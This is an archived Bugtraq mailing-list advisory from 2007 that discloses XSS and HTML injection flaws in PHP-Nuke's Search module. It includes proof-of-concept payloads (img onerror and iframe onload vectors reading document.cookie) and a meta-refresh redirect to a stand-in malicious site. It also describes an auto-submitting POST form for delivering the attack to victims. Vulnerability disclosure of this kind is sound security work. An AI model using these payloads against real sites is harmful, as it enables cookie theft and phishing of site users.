Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

PHP-Nuke (ALL versions) Multiple XSS and HTML injection
From: mikispag () gmail com
Date: 1 Aug 2007 15:58:47 -0000
PHP-Nuke ALL versions Search Module multiple XSS and HTML injection
-------------------------------------------------------------------

The well-known PHP-Nuke CMS is vulnerable to multiple XSS attacks and HTML injections through the Search Module.

The request is made using POST, but the whole process can be automatized creating an ad-hoc page to send to the victim 
with an auto-submitting forum using POST as method and the vulnerable URL (http://vulnsite.com/modules.php?name=Search) 
as ACTION.

Both the XSS and the HTML injection work on IE 6/7 and Firefox (ALL versions), with every server and php.ini 
configuration.

You may use the following queries for testing.

*XSS*:

<img src=http://www.microsoft.com/404.jpg style=display:none onerror=XSS_HERE <
<iframe src=http://www.google.com style=display:none onload=XSS_HERE <

For example:

<img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) <
<iframe src=http://www.google.com style=display:none onload=alert(document.cookie) <

*HTML injection*:

Examples:

<meta http-equiv=refresh content=1;url=http://evilsite.com <

Obviosuly, using XSS a malicious hacker can obtain some sensitive and confidential information like cookies, or set up 
a phishing attack.

Mikispag

  By Date           By Thread  

Current thread:
  • PHP-Nuke (ALL versions) Multiple XSS and HTML injection mikispag (Aug 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]